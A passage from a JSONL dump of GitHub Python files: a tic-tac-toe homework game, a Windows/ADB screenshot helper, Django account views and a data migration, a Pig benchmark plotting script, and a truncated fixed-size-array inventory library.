cyber.shutdown()\n","repo_name":"ApolloAuto/apollo","sub_path":"modules/tools/rosbag/sample_pnc_topics.py","file_name":"sample_pnc_topics.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","stars":23653,"dataset":"github-code","pt":"5"} +{"seq_id":"28388897476","text":"#CSCI 1133 Homework 3\n#Elizabeth Olson\n#Bonus Problem\n\nimport random\nx = True\ny = True\n\nwhile y == True: #allows for the user to decide if they want to play again later in the code\n board = [[' ', ' ', ' '], [' ', ' ', ' '], [' ', ' ', ' ']] #initialize the empty board\n while x == True:\n\n #initialize the counts for the column totals\n totalx0 = 0\n totalx1 = 0\n totalx2 = 0\n totalo0 = 0\n totalo1 = 0\n totalo2 = 0\n\n play1 = int(input(\"Player 1, where would you like to move? \")) #ask the user where they want to move\n if play1 == 0 or play1 == 1 or play1 == 2: #first list/row conditions\n if board[0][play1] is 'x' or board[0][play1] is 'o':\n print('Sorry, that space is already taken')\n continue\n else:\n board[0][play1] = 'x'\n if play1 == 3 or play1 == 4 or play1 == 5: #second list/row conditions\n if board[1][play1-3] is 'x' or board[1][play1-3] is 'o':\n print('Sorry, that space is already taken')\n continue\n else:\n board[1][play1-3] = 'x'\n if play1 == 6 or play1 == 7 or play1 == 8: #third list/row conditions\n if board[2][play1-6] is 'x' or board[2][play1-6] is 'o':\n print('Sorry, that space is already taken')\n continue\n else:\n board[2][play1-6] = 'x'\n\n for i in board: #prints the board in the desired way, with each list on separate lines\n print(i)\n\n #calculations for the number of x's or o's in a row\n ax = board[0].count('x') + board[1].count('x') + board[2].count('x')\n ao = board[0].count('o') + board[1].count('o') + board[2].count('o')\n\n if ax == 5 and ao == 4: #if the board is full and no win conditions are met\n print(\"It's a tie!\")\n x = False\n\n #if the player has a winning row\n if board[0].count('x') == 3 or board[1].count('x') == 3 or board[2].count('x') == 3:\n print(\"You win!\")\n x = False\n\n #if the player has a winning column\n for i in [0,1,2]:\n if board[0][i] == 'x' and board[1][i] == 'x' and board[2][i] == 'x':\n print(\"You win!\")\n x = False\n\n #if the player has a winning diagonal\n if board[0][0] == 'x' and board[1][1] == 'x' and board[2][2] == 'x':\n print(\"You win!\")\n x = False\n if board[0][2] == 'x' and board[1][1] == 'x' and board[2][0] == 'x':\n print(\"You win!\")\n x = False\n\n #beginning of the code for the computer's turn\n #counts the number of x's and o's in a column to be used later\n for i in range(3):\n totalx0 += board[i][0].count('x')\n totalx1 += board[i][1].count('x')\n totalx2 += board[i][2].count('x')\n totalo0 += board[i][0].count('o')\n totalo1 += board[i][1].count('o')\n totalo2 += board[i][2].count('o')\n\n #will only print this if the player has not won already\n if x == True:\n print(\"My turn!\")\n while x == True:\n\n #if computer has 2 in any row, place o in left over spot to win accounting for not having any x's\n if board[0].count('o') == 2 and board[0].count('x') == 0:\n for i in range(3):\n if board[0][i] != 'x':\n board[0][i] = 'o'\n print(\"I win!\")\n x = False\n elif board[1].count('o') == 2 and board[1].count('x') == 0:\n for i in range(3):\n if board[1][i] != 'x':\n board[1][i] = 'o'\n print(\"I win!\")\n x = False\n elif board[2].count('o') == 2 and board[2].count('x') == 0:\n for i in range(3):\n if board[2][i] != 'x':\n board[2][i] = 'o'\n print(\"I win!\")\n x = False\n\n #if computer has 2 in any column, place o in left over spot to win accounting for not having any x's\n elif totalo0 == 2 and totalx0 == 0:\n for i in range(3):\n if board[i][0] != 'o':\n if board[i][0] != 'x':\n board[i][0] = 'o'\n print(\"I win!\")\n x = False\n continue\n elif totalo1 == 2 and totalx1 == 0:\n for i in range(3):\n if board[i][1] != 'o':\n if board[i][1] != 'x':\n board[i][1] = 'o'\n print(\"I win!\")\n x = False\n continue\n elif totalo2 == 2 and totalx2 == 0:\n for i in range(3):\n if board[i][2] != 'o':\n if board[i][2] !='x':\n board[i][2] = 'o'\n print(\"I win!\")\n x = False\n continue\n\n #if computer has 2 in a diagonal position, place an o in the last diagonal position to win accounting for not having any x's\n elif board[0][0] == 'o' and board[1][1] == 'o' and board[2][2] != 'x':\n board[2][2] = 'o'\n print(\"I win!\")\n x = False\n elif board[0][0] == 'o' and board[2][2] == 'o' and board[1][1] != 'x':\n board[1][1] = 'o'\n print(\"I win!\")\n x = False\n elif board[1][1] == 'o' and board[2][2] == 'o' and board[0][0] != 'x':\n board[0][0] = 'o'\n print(\"I win!\")\n x = False\n elif board[0][2] == 'o' and board[1][1] == 'o' and board[2][0] != 'x':\n board[2][0] = 'o'\n print(\"I win!\")\n x = False\n elif board[0][2] == 'o' and board[2][0] == 'o' and board[1][1] != 'x':\n board[1][1] = 'o'\n print(\"I win!\")\n x = False\n elif board[1][1] == 'o' and board[2][0] == 'o' and board[0][2] != 'x':\n board[0][2] = 'o'\n print(\"I win!\")\n x = False\n\n #if player 1 has 2 in any row, place o in left over spot to block\n elif board[0].count('x') == 2 and board[0].count('o') == 0:\n for i in range(3):\n if board[0][i] != 'x':\n board[0][i] = 'o'\n break\n elif board[1].count('x') == 2 and board[1].count('o') == 0:\n for i in range(3):\n if board[1][i] != 'x':\n board[1][i] = 'o'\n break\n elif board[2].count('x') == 2 and board[2].count('o') == 0:\n for i in range(3):\n if board[2][i] != 'x':\n board[2][i] = 'o'\n break\n\n #if player 1 has 2 in any column, place o in left over spot to block\n elif totalx0 == 2 and totalo0 == 0:\n for i in range(3):\n if board[i][0] != 'x':\n if board[i][0] != 'o':\n board[i][0] = 'o'\n break\n elif totalx1 == 2 and totalo1 == 0:\n for i in range(3):\n if board[i][1] != 'x':\n if board[i][1] != 'o':\n board[i][1] = 'o'\n break\n elif totalx2 == 2 and totalo2 == 0:\n for i in range(3):\n if board[i][2] != 'x':\n if board[i][2] !='o':\n board[i][2] = 'o'\n break\n\n #if player 1 has 2 in a diagonal position, place an o in the last diagonal position to block\n elif board[0][0] == 'x' and board[1][1] == 'x' and board[2][2] !='o':\n board[2][2] = 'o'\n break\n elif board[0][0] == 'x' and board[2][2] == 'x' and board[1][1] !='o':\n board[1][1] = 'o'\n break\n elif board[1][1] == 'x' and board[2][2] == 'x' and board[0][0] !='o':\n board[0][0] = 'o'\n break\n elif board[0][2] == 'x' and board[1][1] == 'x' and board[2][0] !='o':\n board[2][0] = 'o'\n break\n elif board[0][2] == 'x' and board[2][0] == 'x' and board[1][1] !='o':\n board[1][1] = 'o'\n break\n elif board[1][1] == 'x' and board[2][0] == 'x' and board[0][2] !='o':\n board[0][2] = 'o'\n break\n\n #if none of the winning or blocking conditions are met, get a random number for the computer to move to\n else:\n play2 = random.randint(0,8)\n if play2 == 0 or play2 == 1 or play2 == 2:\n if board[0][play2] is 'x' or board[0][play2] is 'o':\n continue\n else:\n board[0][play2] = 'o'\n if play2 == 3 or play2 == 4 or play2 == 5:\n if board[1][play2-3] is 'x' or board[1][play2-3] is 'o':\n continue\n else:\n board[1][play2-3] = 'o'\n if play2 == 6 or play2 == 7 or play2 == 8:\n if board[2][play2-6] is 'x' or board[2][play2-6] is 'o':\n continue\n else:\n board[2][play2-6] = 'o'\n break\n\n for i in board:\n print(i)\n\n #allows for the quick replaying and testing\n again = str(input(\"Would you like to play again? (y/n) \"))\n if again == 'y':\n x = True\n elif again == 'n':\n y = False\n","repo_name":"olso6928/SampleProjects","sub_path":"Introduction-to-python(CSCI1133)/Tic-Tac-Toe Basic AI homework/Tic-Tac-Toe_complex.py","file_name":"Tic-Tac-Toe_complex.py","file_ext":"py","file_size_in_byte":9957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"34634213887","text":"import cv2\nimport os\nimport datetime\nimport win32gui, win32ui, win32con, win32api\nfrom ctypes import windll\nimport numpy\nimport base64\nfrom PIL import Image\n\nDEBUGING = True\n# DEBUGING = False\n\ndef SHOW_IMAGE(image):\n if DEBUGING:\n now = datetime.datetime.now()\n now = str(now)\n cv2.imshow(now, image)\n cv2.waitKey()\n cv2.destroyWindow(now)\n else:\n pass\n\n# 需手动获取窗口曲柄&Rect\ndef GetScreenshot(win_handle, win_rect):\n hWnd = win_handle\n left, top, right, bot = win_rect\n width = right - left\n height = bot - top\n\n hWndDC = win32gui.GetWindowDC(hWnd)\n mfcDC = win32ui.CreateDCFromHandle(hWndDC)\n saveDC = mfcDC.CreateCompatibleDC()\n saveBitMap = win32ui.CreateBitmap()\n saveBitMap.CreateCompatibleBitmap(mfcDC,width,height)\n saveDC.SelectObject(saveBitMap)\n saveDC.BitBlt((0,0), (width,height), mfcDC, (0, 0), win32con.SRCCOPY)\n signedIntsArray = saveBitMap.GetBitmapBits(True)\n\n im_opencv = numpy.frombuffer(signedIntsArray, dtype = 'uint8')\n im_opencv.shape = (height, width, 4)\n cv2.cvtColor(im_opencv, cv2.COLOR_BGRA2RGB)\n \n win32gui.DeleteObject(saveBitMap.GetHandle())\n saveDC.DeleteDC()\n mfcDC.DeleteDC()\n win32gui.ReleaseDC(hWnd,hWndDC)\n\n return im_opencv\ndef GetScreenshotByAdb():\n os.system('adb shell screencap -p /sdcard/temp.png')\n os.system('adb pull /sdcard/temp.png ../Pics/')\n image = cv2.imread(\"../Pics/temp.png\")\n image = cv2.resize(image, (image.shape[0]//2, image.shape[1]//2))\n return image\n","repo_name":"Alex-Beng/SuperStarSillyScrubScript","sub_path":"Src/Util.py","file_name":"Util.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"11927563339","text":"from django.shortcuts import render,redirect\r\nfrom django.contrib.auth import login as user_login,logout as user_logout\r\nfrom .forms import UserRegistrationForm,UserLoginForm,UpdateProfileForm\r\nfrom store.models import Customer\r\nfrom store.decorators import check_access\r\nfrom django.contrib import messages\r\n\r\n@check_access(allowed_users=['anonymous',])\r\ndef register(request):\r\n if request.method =='POST':\r\n form=UserRegistrationForm(request.POST)\r\n if form.is_valid():\r\n form.save()\r\n user_obj=form.instance\r\n print(user_obj)\r\n Customer.objects.create(user=user_obj)\r\n messages.success(request,'Account created successfully! please login')\r\n return redirect('accounts:login')\r\n return render(request,'accounts/register.html',{'form':form,})\r\n form=UserRegistrationForm()\r\n return render(request,'accounts/register.html',{'form':form,})\r\n\r\n@check_access(allowed_users=['anonymous',])\r\ndef login(request):\r\n path=request.GET.get('next')\r\n if request.method=='POST':\r\n form=UserLoginForm(request.POST)\r\n if form.is_valid():\r\n user_obj=form.cleaned_data.get('user_obj')\r\n user_login(request,user_obj)\r\n messages.success(request,'You have logged in successfully!')\r\n if user_obj.user_role.role == 'Customer':\r\n if path == None or path == '/accounts/logout/':\r\n return redirect('store:home')\r\n return redirect(path)\r\n elif user_obj.user_role.role == 'ShopOwner':\r\n return redirect('business:shop-owner-home')\r\n elif user_obj.user_role.role == 'DeliveryBoy':\r\n return redirect('business:delivery-boy-home')\r\n elif user_obj.user_role.role == 'Staff':\r\n return redirect('business:staff-home')\r\n else:\r\n return redirect('business:admin-home')\r\n return render(request,'accounts/login.html',{'form':form,})\r\n form=UserLoginForm()\r\n return render(request,'accounts/login.html',{'form':form,})\r\n\r\n@check_access(allowed_users=['Customer','ShopOwner','DeliveryBoy','Admin','Staff',])\r\ndef logout(request):\r\n if request.user.is_authenticated:\r\n user_logout(request)\r\n return render(request,'accounts/logout.html')\r\n\r\n@check_access(allowed_users=['Customer',])\r\ndef customer_profile_update_view(request):\r\n if request.user.is_authenticated:\r\n if request.method == 'POST':\r\n form=UpdateProfileForm(request.POST,instance=request.user)\r\n if form.is_valid():\r\n form.save()\r\n messages.success(request,'Your Profile has updated successfully!')\r\n return redirect('accounts:update-customer-profile')\r\n return render(request,'accounts/update_profile.html',{'form':form,})\r\n form=UpdateProfileForm(instance=request.user)\r\n return render(request,'accounts/update_profile.html',{'form':form,})\r\n return render(request,'store/error.html')","repo_name":"bobby2510/VegMart","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"5"} +{"seq_id":"3236030863","text":"# -*- coding: utf-8 -*-\n\n\nimport re\n\nfrom django.db import migrations\n\n\ndef create_history_entry(obj, dbh, src):\n _dh = obj(\n device=dbh.device,\n device_boot_history=dbh,\n version=src.version,\n release=src.release,\n )\n return _dh\n\n\ndef migrate_kernel_image(apps, schema_editor):\n device = apps.get_model(\"backbone\", \"device\")\n boot_history = apps.get_model(\"backbone\", \"DeviceBootHistory\")\n kernel = apps.get_model(\"backbone\", \"kernel\")\n kernel_hist = apps.get_model(\"backbone\", \"KernelDeviceHistory\")\n image = apps.get_model(\"backbone\", \"image\")\n image_hist = apps.get_model(\"backbone\", \"ImageDeviceHistory\")\n VERS_RE = re.compile(\"^(?P\\d+)\\.(?P\\d+)$\")\n for _dev in device.objects.all():\n if _dev.act_kernel_id and _dev.act_image_id:\n # only handle cases where act_image and act_kernel are set\n dbh = boot_history.objects.create(device=_dev)\n _kh = create_history_entry(kernel_hist, dbh, _dev.act_kernel)\n _kh.kernel = _dev.act_kernel\n kvm = VERS_RE.match(_dev.kernelversion)\n if kvm:\n _kh.version = int(kvm.group(\"version\"))\n _kh.release = int(kvm.group(\"release\"))\n _kh.save()\n _ih = create_history_entry(image_hist, dbh, _dev.act_image)\n _ih.image = _dev.act_image\n ivm = VERS_RE.match(_dev.imageversion)\n if ivm:\n _ih.version = int(ivm.group(\"version\"))\n _ih.release = int(ivm.group(\"release\"))\n _ih.save()\n\n\ndef dummy_reverse(apps, schema_editor):\n pass\n\n\nclass Migration(migrations.Migration):\n\n reversible = True\n\n dependencies = [\n ('backbone', '0819_add_device_image_history'),\n ]\n\n operations = [\n migrations.RunPython(migrate_kernel_image, reverse_code=dummy_reverse)\n ]\n","repo_name":"walong365/icsw","sub_path":"initat/cluster/backbone/migrations/0820_data_migrate_kernel_images.py","file_name":"0820_data_migrate_kernel_images.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"26447395164","text":"#!/bin/python\n\n#Script that plot graphs used in the document\n\nimport csv\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport copy\n\n\nROOT_DIR=\"../../\"\n\nN_TEST = 10\nMIN_NODES = 3\nMAX_NODES = 8\ntree={}\nnodes=[]\n\nx_ar = []\npig_header=[\"date\",\"matrix\",\"n_nodes\",\"time\"]\nlog_header=[\"n_nodes\",\"matrix\",\"test\",\"job\",\"jobId\",\"alias\",\"operation\",\"node\",\"time\"]\npig_file = open(ROOT_DIR+\"log/pig_times.txt\", \"r\")\nlog_file = open(ROOT_DIR+\"log/pig_matrix-mul_extra-fine.csv\", \"r\")\n\n#pre-processing\npig_csv = csv.DictReader(pig_file,fieldnames=pig_header,delimiter=\",\")\nlog_csv = csv.DictReader(log_file,fieldnames=log_header,delimiter=\";\")\n\nprint(\"Building pig_csv tree\")\nfor row in pig_csv:\n\tmat = row[\"matrix\"]\n\tif(row[\"matrix\"] not in tree.keys() ):\n\t\ttree[mat]={}\n\t\tfor i in range(MIN_NODES,MAX_NODES+1):\n\t\t\ttree[mat][str(i)]=[]\n\ttree[ mat ][row[\"n_nodes\"]].append( float(row[\"time\"]) )\n\nprint(\"Building log_csv tree\")\nlog_tree={}\nfor row in log_csv:\n\tmat=row[\"matrix\"]\n\tif(row[\"matrix\"] not in log_tree.keys() ):\n\t\tlog_tree[mat]={}\n\t\tfor i in range(MIN_NODES,MAX_NODES+1):\n\t\t\tlog_tree[mat][str(i)]={}\n\tnode_id=row[\"node\"]\n\tif(node_id not in nodes):\n\t\tnodes.append(node_id)\n\tif(node_id not in log_tree[mat][row[\"n_nodes\"]].keys()):\n\t\tlog_tree[mat][row[\"n_nodes\"]][node_id]={}\n\t\tlog_tree[mat][row[\"n_nodes\"]][node_id][1]=0\n\t\tlog_tree[mat][row[\"n_nodes\"]][node_id][2]=0\n\telse:\n\t\tlog_tree[mat][row[\"n_nodes\"]][node_id][int(row[\"job\"])] = log_tree[mat][row[\"n_nodes\"]][node_id][int(row[\"job\"])] + float(row[\"time\"])\n\nfor mat in log_tree:\n\tfor n_nodes in log_tree[mat]:\n\t\tfor node in log_tree[mat][n_nodes]:\n\t\t\tfor job in log_tree[mat][n_nodes][node]:\n\t\t\t\tlog_tree[mat][n_nodes][node][job]=log_tree[mat][n_nodes][node][job]/10\n\nfor node in nodes:\n\tfor mat in log_tree:\n\t\tplt.clf()\n\t\tplt.title(\"Job time \"+node+\"_\"+mat)\n\t\tplt.xlabel(\"n_workers\")\n\t\tplt.ylabel(\"time [s]\")\n\t\tplot_ar=[[None]*(MAX_NODES+1),[None]*(MAX_NODES+1)]\n\t\tfor n_nodes in log_tree[mat]:\n\t\t\ttry:\n\t\t\t\tfor job in log_tree[mat][n_nodes][node]:\n\t\t\t\t\tplot_ar[int(job)-1][ int(n_nodes)]=log_tree[mat][n_nodes][node][job]\n\t\t\texcept Exception: continue\n\t\tfor ar in plot_ar:\n\t\t\tplt.plot(ar,label=\"job\"+ str( plot_ar.index(ar)+1)+\" \"+mat )\n\t\tplt.legend()\n\t\tplt.savefig(ROOT_DIR+\"/doc/img/job_\"+node+\"_\"+mat+\".png\")\n\nprint(\"Plotting cumulative exec time per job\")\nfor mat in log_tree:\n\tplt.clf()\n\tplt.title(\"Overlapping job time, \"+mat)\n\tplt.xlabel(\"n_workers\")\n\tplt.ylabel(\"time [s]\")\n\tfor node in nodes:\n\t\tplot_ar=[[None]*(MAX_NODES+1),[None]*(MAX_NODES+1)]\n\t\tfor n_nodes in log_tree[mat]:\n\t\t\ttry:\n\t\t\t\tfor job in log_tree[mat][n_nodes][node]:\n\t\t\t\t\tplot_ar[int(job)-1][ int(n_nodes)]=log_tree[mat][n_nodes][node][job]\n\t\t\texcept Exception: continue\n\t\tfor ar in plot_ar:\n\t\t\tplt.plot(ar,label=\"job\"+ str( plot_ar.index(ar)+1)+\" \"+mat )\n\t\tplt.savefig(ROOT_DIR+\"/doc/img/global_job\"+\"_\"+mat+\".png\")\n\n#plot mean exec time with boxes\nprint(\"Plotting mean exec time\")\nfor matrix in tree:\n\tar_time=[]\n\tfor i in range(MIN_NODES, MAX_NODES+1):\n\t\tar_time.append(tree[matrix][str(i)] )\n\tplt.clf()\n\tplt.title(\"Total Execution time \"+matrix)\n\tplt.xlabel(\"n_workers-2\")\n\tplt.ylabel(\"time [s]\")\n\tplt.boxplot(ar_time, 0, '')\n\tplt.savefig(ROOT_DIR+\"doc/img/box_\"+matrix+\".png\")\n\n#plot speedup\nprint(\"Plotting speedup\")\n\n#init x_axis\nx_avg=[]\nfor item in tree[\"m500\"]:\n\t\tx_avg.append(int(item))\n\navg={}\navg_sorted={}\nfor matrix in tree:\n\tavg[matrix]=[]\n\tfor item in tree[matrix]:\n\t\tavg[matrix].append(np.mean(tree[matrix][item]))\n\nfor matrix in tree:\n\tavg_sorted[matrix] = sorted(avg[matrix], key=lambda elem: x_avg[avg[matrix].index(elem)])\n\nfor matrix in tree:\n\tbase = copy.deepcopy(avg_sorted[matrix][0])\n\tfor i in range(0,len(avg_sorted[matrix])):\n\t\tavg_sorted[matrix][i] = base/avg_sorted[matrix][i]\n\nx_avg.sort()\n\nfor matrix in tree:\n\tplt.clf()\n\tplt.title(\"Speed up \"+matrix)\n\tplt.xlabel(\"n_workers\")\n\tplt.plot(x_avg,avg_sorted[matrix],label=\"speed up \"+matrix)\n\tplt.legend()\n\tplt.savefig(ROOT_DIR+\"doc/img/speedup_\"+matrix+\".png\")\n\n\n\n\n\n\n\n","repo_name":"fusiled/hadoop-pig-matrix-multiplication-benchmark","sub_path":"src/post_test/graphPlotter.py","file_name":"graphPlotter.py","file_ext":"py","file_size_in_byte":3977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"41305895398","text":"\"\"\"Lib inventory\n\nThis module just as its name; implements Inventory system.\nHowever, you might see somewhat different implementations.\nThis module adapts typical staticallt allocated file system.\n\nFor extending the size of an Inventory, you can use inv.extend() function.\n\nNote: Inventory class is careful to its size; It'll scream at you when you are trying to append a new data on fully allocated Inventory.\"\"\"\n\nfrom __future__ import annotations\n\n__all__ = ['SameIdentifierException',\n 'FixedSizeArray', 'LinkedFSA', 'Inventory', 'null', 'fsa_null']\n\nfrom typing import Any, List, Literal, Union\nimport warnings\nfrom libshared import ConstCreator, PUID\n\nnull = ConstCreator.define('null', None)\nfsa_null = ConstCreator.define('', null)\n\n\nclass SameIdentifierException(Exception):\n \"\"\"The given argument is the same object as saved/operated object.\"\"\"\n\n\nclass FixedSizeArray:\n \"\"\"Fixed-size array (not so)\"\"\"\n\n def __init_subclass__(cls, **kwargs) -> None:\n raise Exception(\"Cannot subclass FSA.\")\n\n def __init__(self, size: int, noallocate=False):\n self._size = size\n self.__array: List[Union[ConstCreator, Any]] = [null]*size\n self.__fake_address_UUID = PUID.make_random()\n self.__fake_address = self.__fake_address_UUID.body.upper()\n self.__noalloc = noallocate\n self._name = None\n self._owner = None\n\n def insert(self, index: int, data: Any):\n \"\"\"Insert an object before index\"\"\"\n self._yell_at_externally_extended_size()\n if index > self._size-1:\n raise IndexError(\n \"Array index out of range; you can do self.allocate()\")\n self.__array.insert(index, data)\n self.__array.pop(index+1)\n\n def pop(self, index: int):\n \"\"\"Remove and return an item at index.\"\"\"\n self._yell_at_externally_extended_size()\n self.__array.insert(index, null)\n return self.__array.pop(index+1)\n\n def remove(self, value):\n \"\"\"Remove an item based on value\"\"\"\n self._yell_at_externally_extended_size()\n i = self.__array.index(value)\n self.pop(i)\n\n def __len__(self):\n \"\"\"Implement len(self)\"\"\"\n return self._size\n\n def __iter__(self):\n \"\"\"Implement iter(self)\"\"\"\n yield self.__array.__iter__()\n\n def clear(self):\n \"\"\"Clear all item from array.\"\"\"\n self.__array.clear()\n self.__array.extend([null]*self._size)\n\n def copy(self, noalloc: bool = True) -> 'FixedSizeArray':\n \"\"\"Copy an item from an array\"\"\"\n ret = FixedSizeArray(self._size, noalloc)\n for i, x in enumerate(self):\n if x is null:\n continue\n ret.insert(i, x)\n\n @classmethod\n def new(cls, *instances) -> 'FixedSizeArray':\n \"\"\"Create a new FixedSizeArray\"\"\"\n if len(instances) == 1:\n if hasattr(instances[0], '__iter__'):\n instances = instances[0]\n self = cls(len(instances))\n for i, x in enumerate(instances):\n self.insert(i, x)\n\n def __setitem__(self, index: int, value: int):\n \"\"\"Implement self[index] = value\"\"\"\n if index > self._size-1:\n raise IndexError('Array out of range')\n self.insert(index, value)\n\n def __getitem__(self, index: int):\n \"\"\"Implement self[index]\"\"\"\n if index > self._size-1:\n raise IndexError(\"Array out of range\")\n return self.__array[index]\n\n reset = clear\n\n # Breaking the name rule\n\n def allocate(self, size: int):\n \"\"\"Allocate new size for the array\"\"\"\n if self.__noalloc is True:\n raise Exception(\"This array can't be allocated.\")\n self.__array.extend([null]*size)\n self._size = len(self.__array)\n\n def free(self, size: int):\n \"\"\"Release/take away size from the array.\"\"\"\n if self.__noalloc is True:\n self.reset()\n return\n size = abs(size)\n if size > len(self.__array):\n raise Exception(\n \"Failed to freeing larger amount of allocated data.\")\n if size == 0:\n self.__array.clear()\n self._size = 0\n else:\n self.__array = self.__array[:len(self.__array)-size]\n self._size = len(self.__array)\n\n # end of rule breaker\n\n @property\n def address(self):\n \"\"\"Return pseudo address of this array.\"\"\"\n return self.__fake_address\n\n @property\n def allocated(self):\n \"\"\"Return how much allocated data in this array.\"\"\"\n return len([data for data in self.__array if data is not null])\n\n @property\n def size(self):\n \"\"\"\"Return the size of this array.\"\"\"\n return self._size\n\n # We can finally calculate used space or whatever\n\n @property\n def allow_alloc(self):\n \"\"\"Return true if this array allocable\"\"\"\n return not self.__noalloc\n\n @property\n def linked_name(self):\n \"\"\"Return link name of this array. None if unbind.\"\"\"\n return self._name\n\n def _yell_at_externally_extended_size(self):\n \"\"\"Raise if the array is externally changed.\"\"\"\n if len(self.__array) > self._size:\n raise Exception(\n \"The array is externally edited. Size of array is unmatched with current size. No 'auto' alloc.\")\n\n def __repr__(self):\n \"\"\"Return repr(self)\"\"\"\n return repr(self.__array)\n\n def _set_name(self, owner: LinkedFSA, name: str):\n \"\"\"Set link name of this array. Owner must be instance of LinksedFSA\"\"\"\n if not isinstance(owner, LinkedFSA):\n raise Exception(\"Is not LinkedFSA object\")\n if self._name is not None:\n if owner != self._owner:\n raise Exception(\n f\"This FSA seems locked by a LinkedFSA object. (pre-owner ref: {owner.name} | owner ref: {self._owner.name}\")\n self._name = name\n self._owner = owner\n\n def _reset_name(self, owner: LinkedFSA):\n \"\"\"Reset link name of this array. Or, unbind this array.\"\"\"\n if not isinstance(owner, LinkedFSA):\n raise Exception(\"Invalid owner type\")\n if not owner == self._owner:\n raise Exception(\"Invalid owner object\")\n self._name = None\n self._owner = None\n\n @property\n def name(self):\n \"\"\"Return linked name of this array\"\"\"\n return self._name\n\n def __contains__(self, other):\n \"\"\"Return true if something is in this array.\"\"\"\n return other in self.__array if other is not null else False\n\n\nclass LinkedFSA:\n \"\"\"Linked FixedSizeArray\"\"\"\n\n def __init_subclass__(cls, **kwargs) -> None:\n raise Exception(\"LinkedFSA must not be subclassed.\")\n\n def __init__(self, *array: FixedSizeArray):\n self._links: List[FixedSizeArray] = []\n self._linkID = PUID.make_random()\n for x in array:\n self._watcher(x)\n self.append(x)\n\n def _watcher(self, array: FixedSizeArray):\n \"\"\"Watcher method of incoming array\"\"\"\n if not isinstance(array, FixedSizeArray):\n raise TypeError(\"The type of array is not FixedSizeArray.\")\n\n def detach(self, block_index: int):\n \"\"\"Detaching and unlock a FixedSizeArray\"\"\"\n fsa = self._links.pop(block_index)\n self._links.insert(block_index, fsa_null)\n fsa._reset_name(self)\n\n def __len__(self):\n \"\"\"Implement len(self)\"\"\"\n return len(self._links)\n\n # Report methods\n\n def _get_report(self):\n \"\"\"Get link report\"\"\"\n print(f\"=== Report for {self._linkID.body.upper()} ===\")\n for i, link in enumerate(self._links):\n if link is fsa_null:\n print(f\"NULL on link-block({i}) size=0 avail=0% alloc=0\")\n continue\n print(f\"{link.address} on {link.name} size={link.size} avail={(link.size-link.allocated)/link.size*100}% alloc={link.allocated}\")\n print(f\"==============={'='*len(self._linkID.body.upper())}====\")\n\n # end of Report methods definitions\n\n @property\n def available(self):\n \"\"\"Value indicating how much data is available in all blocks\"\"\"\n x = 0\n for link in self._links:\n if link is fsa_null:\n continue # skip on NULL\n x += link.size - link.allocated\n return x\n\n @property\n def lsa(self):\n \"\"\"Link size-available\"\"\"\n x = []\n for link in self._links:\n if link is fsa_null:\n x.append(0)\n continue\n x.append(link.size - link.allocated)\n return tuple(x)\n\n @property\n def linksize(self):\n \"\"\"Link size\"\"\"\n x = []\n for link in self._links:\n if link is fsa_null:\n x.append(0)\n continue\n x.append(link.size)\n return tuple(x)\n\n @property\n def size(self):\n \"\"\"Size of all link\"\"\"\n x = 0\n for link in self._links:\n if link is fsa_null:\n continue # skip on NULL\n x += link.size\n return x\n\n @property\n def name(self):\n \"\"\"Name or UID of this instance.\"\"\"\n return self._linkID.body.upper()\n\n def __getitem__(self, index: int):\n \"\"\"Implement self[index]\"\"\"\n return self._links[index]\n\n def __setitem__(self, index: int, value: Any):\n \"\"\"Implement self[index] = value\"\"\"\n self.insert(index, value)\n\n def append(self, *value: FixedSizeArray):\n \"\"\"Append a FixedSizeArray into this instance\"\"\"\n for x in value:\n self._watcher(x)\n addresses = [link.address for link in self._links]\n if x.address in addresses:\n raise ValueError(\n \"The value is somewhat exists in this LinkedFSA\")\n lid = len(self._links)\n x._set_name(self, f'link-block({lid})')\n self._links.append(x)\n\n def insert(self, index: int, value: FixedSizeArray):\n \"\"\"Insert a new link into given index\"\"\"\n self._watcher(value)\n value._set_name(self, f'link-block({index})')\n links = self._links[index:]\n [link._set_name(\n self, f'link-block({self._links.index(link)+1})') for link in links]\n self._links.insert(index, value)\n\n def pop(self, index: int) -> FixedSizeArray:\n \"\"\"Get a FSA and removes it.\"\"\"\n v = self[index]\n self.detach(index)\n return v\n\n def remove(self, value: FixedSizeArray):\n \"\"\"Remove a FSA from this instance\"\"\"\n self._watcher(value)\n i = self._links.index(value)\n self.detach(i)\n\n def replace(self, index: int, value: FixedSizeArray):\n \"\"\"Replace a FSA/NULL from this instance in given index\"\"\"\n self._watcher(value)\n if self[index] is not fsa_null:\n self.detach(index)\n name = f'link-block({index})'\n value._set_name(self, name)\n self._links.insert(index, value)\n self._links.pop(index+1)\n\n def __contains__(self, other):\n \"\"\"Return true if other in this instance.\"\"\"\n for link in self._links:\n if link is fsa_null:\n continue\n if other in link:\n return True\n return False\n\n def __repr__(self):\n \"\"\"Implement repr(self)\"\"\"\n return '['+', '.join((link.address if hasattr(link, 'address') else str(link)) for link in self._links)+']'\n\n def _smart_index(self, link_index: int):\n # Say, index is 80 while our links is 2 50-sized array. 80-50 = 30\n # This may can't use negative index. but, let's see...\n # Return: Link index, link's index\n if link_index > self.size:\n raise IndexError(\n f\"Linked Index out of range ({link_index} > {self.size}; perhaps you forgot to append?)\")\n if link_index < 0:\n while link_index < 0:\n link_index += self.size\n clsa = self.linksize\n tli = link_index\n for i, a in enumerate(clsa):\n if tli > a:\n tli -= a\n continue\n if self[i] is fsa_null:\n if len(self) == i:\n raise IndexError(\"Index out or range\")\n i += 1\n if tli == len(self[i]):\n if len(self) == i:\n raise IndexError(\"Index out or range\")\n if self[i+1] == fsa_null:\n if len(self) == i+1:\n raise IndexError(\"Index out or range\")\n return i+2, 0\n return i+1, 0\n return i, tli\n raise Exception(\"Smart index can't return!\")\n\n def smart_insert(self, link_index: int, value: Any):\n \"\"\"Insert a value into a link from a given index (The index should be less than 